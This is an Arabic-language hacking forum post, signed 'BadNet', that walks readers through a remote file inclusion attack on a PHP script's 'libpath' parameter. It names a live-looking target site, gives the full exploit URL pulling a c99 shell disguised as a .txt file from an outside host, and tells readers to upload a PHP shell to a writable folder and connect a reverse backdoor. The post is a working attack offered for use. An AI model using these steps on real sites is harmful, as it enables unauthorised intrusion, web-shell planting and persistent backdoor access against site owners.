راح نلاقي مواقع كتيرة (( نصهم سكروا الثغرة ورة يومين من اكتشافها معليش ))
بس انا جبتلكم موقع للتجربة
http://www.ucsserver.com
المهم حتقولي كيف نستثمر الثغرة ؟؟ حقولك بعد رابط الموقع تضيف كود: SQuery/lib/armygame.php?libpath=http://members.lycos.co.uk/dmarhackerz/ss.txt?
مع تغير ال http://members.lycos.co.uk/dmarhackerz/ss.txt الى رابط الشيل تبعك بس لازم يكون امتداد الشيل txt يعني مثال : عندي شيل c99.php روح نشيل .php ونحط كود: .txt
وترفعه على موقعك وحطها برابط الاستغلال
ملاحطة مهمة ((( بعد رابط الشيل تبعك لازم تحط علامة ؟ )))
بحيث الموقع راح يصير على الشكل التالي : كود: http://www.ucsserver.com/SQuery/lib/armygame.php?libpath=http://members.lycos.co.uk/dmarhackerz/ss.txt?
وهاي صورة : ( معليش حكينا مصور بس الموضوع فيه بس صورة وحدة لأن اصلا الثغرة بدهاش شرح )
بعد ما تطبق الثغرة روح شوفلك ملف تصريح 777 وارفع فيه شيل وجيب رابطها وبعدين راح تصير عندك شيل .php يعني مش زي الثغرة .txt
بعدها ارفع باكدور عكسي واتصل فيه وبعدين شوف شغلك
انتهى الشرح اي استفسار انا حاظر $$ شباب الرجاء حفظ الحقوق BadNet